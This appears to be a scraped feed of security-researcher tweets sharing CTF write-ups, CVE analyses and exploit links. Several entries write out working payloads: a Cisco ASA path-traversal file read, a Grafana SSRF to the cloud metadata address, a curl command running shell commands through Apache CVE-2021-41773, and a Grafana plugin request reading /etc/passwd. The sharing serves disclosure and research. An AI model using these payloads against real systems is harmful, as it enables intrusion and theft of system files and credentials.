docs.google.com/document/d/1TO… #meepwnctf #meepwn MeePwnTube writeup lol

docs.google.com/document/d/11N… #TWCTF Slack emoji converter

sploitus.com Exploits & Tools Search Engine

lab.wallarm.com/rce-in-php-or-…

My raw #Wordpress #RCE js exploit for CVE-2019-8942 & CVE-2019-8943 issues: gist.github.com/allyshka/f159c…. #exploit #infosec

Freshly patched RCE in PHP-FPM: bugs.php.net/bug.php?id=785… Exploit: github.com/neex/phuip-fpi… Many nginx+PHP configurations vulnerable, watch out!

PHP 0day fixed lab.wallarm.com/php-remote-cod… (fix: git.php.net/?p=php-src.git…)

CVE-2020-8163 - Remote code execution of user-provided local names in Rails Versions Affected: rails < 5.0.1 - Fixed Versions: 4.2.11.2 PoC github.com/sh286/CVE-2020…

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking!

Thank you all so much, that’s incredible, I’m just speechless. We will try very hard and do our best at the production stage to make sure everyone gets Flipper on time. These two days were just crazy and I need to get some sleep now. See ya soon. P.S check the new skin out

Check out Justin Gardner's blog post on CVE-2020-13379: Unauthenticated SSRF in Grafana! rhynorater.github.io/CVE-2020-13379… POC: /avatar/tesdt%3Fd=redirect.rhynorater.com%25253f%253b%https://t.co/tpG2O3i9Bj%252f169.254.169.254

Analysis of CVE-2020-14882 Weblogic RCE via HTTP CVSS 9.8/10 Hope you enjoy it ;) Thanks an anonymous man for supporting! testbnull.medium.com/weblogic-rce-b…

TetCTF2021: I have a Web⚔️Crypto: Next-Gen Proxy challenge. It's get inspired by great research of Joshua Maddux was presentation in BlackHat USA 2020. It's about TLS + SSRF = RCE. Also, here is my slide included in the flag of this: shorturl.at/cquJ7 Happy hacking new year.

#TetCTF2021 #AMF2 unintended solution

Smarty Template Engine Multiple Sandbox Escape PHP Code Injection Vulnerabilities: srcincite.io/blog/2021/02/1…

I've just released the source code for 1u.ms at github.com/neex/1u.ms. PRs are welcome :)

The presentation from my talk "Weird Proxies/2 and a bit of magic" at ZeroNights speakerdeck.com/greendog/2-and…

Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49 curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv Patch urgently.

DIFFERENT + MIX = SSRF BYPASS

Grafana's LFI (grafana-clock-panel plugin): GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd